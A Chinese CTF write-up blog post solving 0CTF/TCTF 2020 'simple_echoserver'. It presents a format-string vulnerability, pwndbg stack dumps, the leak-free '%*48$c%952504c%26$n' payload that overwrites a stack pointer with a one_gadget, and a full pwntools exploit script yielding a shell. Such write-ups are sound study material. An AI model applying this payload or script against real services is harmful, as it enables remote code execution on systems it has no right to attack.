TCTF/0CTF2020初赛simple_echoserver

学到了个格式化字符串的新姿势,这也太牛逼了

TCTF/0CTF初赛的一题,应该算是最简单的一道了,可惜当时也没解出来

Simple_echoserver

程序漏洞很明显:

1
2
3
4
5
int __fastcall sub_13C1(info *user)
{
  snprintf(buffer, 0x100uLL, "[USER] name: %s; phone: %ld\n", user, user->p_num);
  return fprintf(stderr_, buffer);
}

一个格式化字符串的漏洞,这题难点也是这,只有这一次的机会,后续的操作就没有可以利用的点了,连接远程的时候发现没有回显,估计是错误流被重定向到/dev/null

这里学到的新姿势是在听腾讯公开课的时候学到的(Homura tql!):

aCQyNj.png

这个占位符在配合$,可以实现无泄漏就能得到你想要的值,这题用这种方法的话,就会变得很简单,下个断点在fprintf(stderr_, buffer);这:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
 RAX  0x0
 RBX  0x0
 RCX  0x0
 RDX  0x0
 RDI  0x7fb7a4697680 (_IO_2_1_stderr_) ◂— 0xfbad2087
 RSI  0x5643081ac060 ◂— '[USER] name: %*48$c%952504c%26$n%228c%7$hhn; phone: 9223372036854775807\n'
 R8   0x0
 R9   0x0
 R10  0x0
 R11  0x5643081aa0a3 ◂— 0x6e6520776f4e000a /* '\n' */
 R12  0x5643081a90f0 ◂— endbr64 
 R13  0x7ffe0029a0a0 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x7ffe00299e80 —▸ 0x7ffe00299fa0 —▸ 0x7ffe00299fc0 —▸ 0x5643081a94e0 ◂— endbr64 
 RSP  0x7ffe00299e70 ◂— 0x0
 RIP  0x5643081a9415 ◂— call   0x5643081a90a0
───────────────────────────────────[ DISASM ]───────────────────────────────────
0x5643081a9415    call   0x5643081a90a0 <0x5643081a90a0>
 
   0x5643081a941a    nop    
   0x5643081a941b    leave  
   0x5643081a941c    ret    
 
   0x5643081a941d    push   rbp
   0x5643081a941e    mov    rbp, rsp
   0x5643081a9421    sub    rsp, 0x110
   0x5643081a9428    mov    rax, qword ptr fs:[0x28]
   0x5643081a9431    mov    qword ptr [rbp - 8], rax
   0x5643081a9435    xor    eax, eax
   0x5643081a9437    lea    rdi, [rip + 0x2d22]
───────────────────────────────────[ STACK ]────────────────────────────────────
00:0000│ rsp  0x7ffe00299e70 ◂— 0x0
01:0008│      0x7ffe00299e78 —▸ 0x5643081ac160 ◂— '%*48$c%952504c%26$n%228c%7$hhn'
02:0010│ rbp  0x7ffe00299e80 —▸ 0x7ffe00299fa0 —▸ 0x7ffe00299fc0 —▸ 0x5643081a94e0 ◂— endbr64 
03:00180x7ffe00299e88 —▸ 0x5643081a9443 ◂— lea    rdi, [rip + 0xc5b]
04:00200x7ffe00299e90 ◂— 0x0
... ↓
06:00300x7ffe00299ea0 —▸ 0x7ffe00299fa0 —▸ 0x7ffe00299fc0 —▸ 0x5643081a94e0 ◂— endbr64 
07:00380x7ffe00299ea8 —▸ 0x7fb7a4696a00 (_IO_2_1_stdin_) ◂— 0xfbad208b
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
 ► f 0     5643081a9415
   f 1                0
────────────────────────────────────────────────────────────────────────────────
pwndbg> stack 30
00:0000│ rsp  0x7ffe00299e70 ◂— 0x0
01:0008│      0x7ffe00299e78 —▸ 0x5643081ac160 ◂— '%*48$c%952504c%26$n%228c%7$hhn'
02:0010│ rbp  0x7ffe00299e80 —▸ 0x7ffe00299fa0 —▸ 0x7ffe00299fc0 —▸ 0x5643081a94e0 ◂— endbr64 
03:00180x7ffe00299e88 —▸ 0x5643081a9443 ◂— lea    rdi, [rip + 0xc5b]
04:00200x7ffe00299e90 ◂— 0x0
... ↓
06:00300x7ffe00299ea0 —▸ 0x7ffe00299fa0 —▸ 0x7ffe00299fc0 —▸ 0x5643081a94e0 ◂— endbr64 
07:00380x7ffe00299ea8 —▸ 0x7fb7a4696a00 (_IO_2_1_stdin_) ◂— 0xfbad208b
08:00400x7ffe00299eb0 ◂— 0xd68 /* 'h\r' */
09:00480x7ffe00299eb8 —▸ 0x7fb7a43381b8 (_IO_file_underflow+296) ◂— test   rax, rax
0a:00500x7ffe00299ec0 ◂— 0xa4056a00
0b:00580x7ffe00299ec8 ◂— 0xffffffffffffffff
0c:00600x7ffe00299ed0 —▸ 0x5643081a90f0 ◂— endbr64 
0d:00680x7ffe00299ed8 ◂— 0xa /* '\n' */
0e:00700x7ffe00299ee0 —▸ 0x7ffe00299f80 —▸ 0x7ffe00299fa0 —▸ 0x7ffe00299fc0 —▸ 0x5643081a94e0 ◂— ...
0f:00780x7ffe00299ee8 —▸ 0x5643081a90f0 ◂— endbr64 
10:00800x7ffe00299ef0 —▸ 0x7ffe0029a0a0 ◂— 0x1
11:00880x7ffe00299ef8 ◂— 0x0
... ↓
13:00980x7ffe00299f08 —▸ 0x5643081a9348 ◂— mov    rcx, qword ptr [rbp - 0x18]
14:00a0│      0x7ffe00299f10 —▸ 0x7fb7a4696a00 (_IO_2_1_stdin_) ◂— 0xfbad208b
15:00a8│      0x7ffe00299f18 —▸ 0x7ffe00299f38 —▸ 0x7fb7a4339400 (_IO_doallocbuf+144) ◂— mov    eax, dword ptr [rbx]
16:00b0│      0x7ffe00299f20 ◂— '111111111111111111111111'
... ↓
19:00c8│      0x7ffe00299f38 —▸ 0x7fb7a4339400 (_IO_doallocbuf+144) ◂— mov    eax, dword ptr [rbx]
1a:00d0│      0x7ffe00299f40 ◂— 0x36 /* '6' */
1b:00d8│      0x7ffe00299f48 —▸ 0x5643081ac17e ◂— 0x0
1c:00e00x7ffe00299f50 —▸ 0x7ffe00299f80 —▸ 0x7ffe00299fa0 —▸ 0x7ffe00299fc0 —▸ 0x5643081a94e0 ◂— ...
1d:00e80x7ffe00299f58 —▸ 0x5643081a928d ◂— mov    r12d, eax
1e:00f0│      0x7ffe00299f60 ◂— 0x100081aa029
1f:00f8│      0x7ffe00299f68 ◂— 0x7b35919408334d00
20:01000x7ffe00299f70 ◂— 0x0
... ↓
22:01100x7ffe00299f80 —▸ 0x7ffe00299fa0 —▸ 0x7ffe00299fc0 —▸ 0x5643081a94e0 ◂— endbr64 
23:01180x7ffe00299f88 —▸ 0x5643081a93b3 ◂— mov    rdx, qword ptr [rbp - 8]
24:01200x7ffe00299f90 —▸ 0x7ffe0029a0a0 ◂— 0x1
25:01280x7ffe00299f98 ◂— 0x7b35919408334d00
26:01300x7ffe00299fa0 —▸ 0x7ffe00299fc0 —▸ 0x5643081a94e0 ◂— endbr64 
27:01380x7ffe00299fa8 —▸ 0x5643081a94d0 ◂— mov    eax, 0
28:01400x7ffe00299fb0 —▸ 0x7ffe0029a0a0 ◂— 0x1
29:01480x7ffe00299fb8 ◂— 0x0
2a:01500x7ffe00299fc0 —▸ 0x5643081a94e0 ◂— endbr64 
2b:01580x7ffe00299fc8 —▸ 0x7fb7a42ccb97 (__libc_start_main+231) ◂— mov    edi, eax

我们可以输入%*48$c%952504c%26$n来把19:00c8│ 0x7ffe00299f38 —▸ 0x7fb7a4339400 (_IO_doallocbuf+144) ◂— mov eax, dword ptr [rbx]

这里原本的值改成one_gadget,首先是%*48$取到的会是__libc_start_main+231这里的值,接着在加上偏移952504,再配合%26$n就可以直接改掉那个栈上残留的libc的值,效果如下(有时候会该不成功,感觉可能是输出太多字符了把):

1
2
3
4
15:00a8│      0x7ffe00299f18 —▸ 0x7ffe00299f38 —▸ 0x7f3d39edd45c (exec_comm+2508) ◂— mov    rax, qword ptr [rip + 0x2e0a45]
16:00b0│      0x7ffe00299f20 ◂— 0x3131313131313131 ('11111111')
... ↓
19:00c8│      0x7ffe00299f38 —▸ 0x7f3d39edd45c (exec_comm+2508)

这里还要注意的就是我们输入的phone长度要正好0x18,这样栈上才会有指针指向我们要改的这里

后面的操作就只要把rbp改到这里,这样main函数返回的时候就会被劫持到one_gadget了(因为从 sub_141D函数返回到main函数在加上main函数自己返回一共有两次的leave,ret),这里要小爆破下,1/16的几率应该挺高的了

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
from pwn import *
import sys

context.arch = 'amd64'

def debug(addr,PIE=True):
	if PIE:
		text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
		gdb.attach(p,'b *{}\nc\n'.format(hex(text_base+addr)))
	else:
		gdb.attach(p,"b *{}".format(hex(addr)))


def main(host,port=9999):
	global p
	if host:
		p = remote(host,port)
	else:
		dev_null = open("/dev/null","w")
		p = process("./simple_echoserver",stderr=dev_null)
		# p = process("./simple_echoserver")
		debug(0x000000000001415)
		# gdb.attach(p)
	p.recvuntil("Your name: ")
	p.send("%*48$c%952504c%26$n%228c%7$hhn\n")
	# p.send("%*48$c%952504c%26$n%164c%*43$c%144c%7$hhn\n")
	p.recvuntil("Your phone: ")
	# pause()
	p.sendline("1"*0x18)
	p.recvuntil("yourself!")
	p.send("~.\n")
	p.interactive()
	
if __name__ == "__main__":
	libc = ELF("/lib/x86_64-linux-gnu/libc.so.6",checksec=False)
	# elf = ELF("./bf",checksec=False)
	main(args['REMOTE'])

感觉这个方法唯一的缺陷就是输出了太多太多的字符,要是没有像这题一样,alarm给的是600秒,而且还重定向了错误流,估计光光接受返回的数据就把时间耗完了,不过这个真的太牛逼了,不用泄露就完成了攻击,tql

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

beginner